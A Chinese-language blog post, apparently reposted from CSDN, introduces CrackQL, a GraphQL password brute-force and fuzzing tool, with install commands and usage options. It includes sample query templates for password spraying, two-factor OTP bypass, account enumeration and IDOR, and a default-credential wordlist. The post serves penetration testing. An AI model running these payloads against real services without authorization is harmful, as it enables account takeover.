CrackQL:一款功能强大的图形化密码爆破和模糊测试工具

关于CrackQL

CrackQL是一款功能强大的图形化密码爆破和模糊测试工具,在该工具的帮助下,广大研究人员可以针对密码安全和应用程序安全进行渗透测试。

除此之外,CrackQL同时也是一款通用的GraphQL渗透测试工具,它可以控制速率限制和其他分析控制技术来对目标系统进行凭证爆破和模糊测试等操作,以测试程序的安全性。

工具运行机制

CrackQL的工作原理是将单个GraphQL查询或变异自动批量处理为多个别名操作,该工具可以根据CSV输入变量确定要使用的别名数。在以编程方式生成分批GraphQL文档后,CrackQL然后会分批并将Payload发送到目标GraphQL
API,并解析结果和错误信息。

工具依赖组件

Python3

Requests

GraphQL

Jinja

工具安装

广大研究人员可以使用下列命令将该项目源码克隆至本地:git clone [email protected]:nichola*saleks/CrackQL.git

接下来,利用项目提供的requirements.txt文件安装该工具所需的依赖组件:pip install -r requirements.txt

工具运行

查看帮助信息python3 CrackQL.py -h Options:-h, --help 显示工具帮助信息和退出-t URL, --target=URL 目标GraphQL节点的URL路径-q QUERY, --query=QUERY指定输入查询或编译操作-i INPUT_CSV, --input-csv=INPUT_CSV输入CSV列表的文件路径-d DELIMITER, --delimiter=DELIMITERCSV输入分隔符,默认:“,”-o OUTPUT_DIRECTORY, --output-directory=OUTPUT_DIRECTORY存储结果的输出目录,默认:./results/[domain]_[uuid]/-b BATCH_SIZE, --batch-size=BATCH_SIZE每次GraphQL文档请求的批量操作数量,默认:100-D DELAY, --delay=DELAY批量请求发送的时间间隔,默认:0–verbose 启用工具Verbose模式-v, --version 输出工具当前版本和退出

使用样例python3 CrackQL.py -t http://example.com/graphql -q sample-queries/login.graphql -i sample-inputs/usernames_and_passwords.csv

工具使用演示

密码喷射爆破

sample-queries/login.graphqlmutation {login(username: { {username|str}}, password: { {password|str}}) {accessToken}}

双因素身份验证OTP绕过

sample-queries/otp-bypass.graphqlmutation {twoFactor(otp: { {otp|int}}) {accessToken}}

用户账号枚举

sample-queries/enumeration.graphqlquery {signup(email: { {email|str}}, password: { {password|str}}) {user {email}}}

不安全的直接对象引用

sample-queries/idor.graphqlquery {profile(uuid: { {uuid|int}}) {nameemailpicture}}

字典Payload

sample-inputs/usernames_and_passwords.csvusername, passwordadmin, adminadmin, passwordadmin, passadmin, pass123admin, password123operator, operatoroperator, passwordoperator, passoperator, pass123operator, password123

最后

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:


当然除了有配套的视频,同时也为大家整理了各种文档和书籍资料&工具,并且已经帮大家分好类了。

因篇幅有限,仅展示部分资料,有需要的小伙伴,可以【点下方卡片】免费领取:

猜你喜欢

转载自blog.csdn.net/web2022050901/article/details/132101060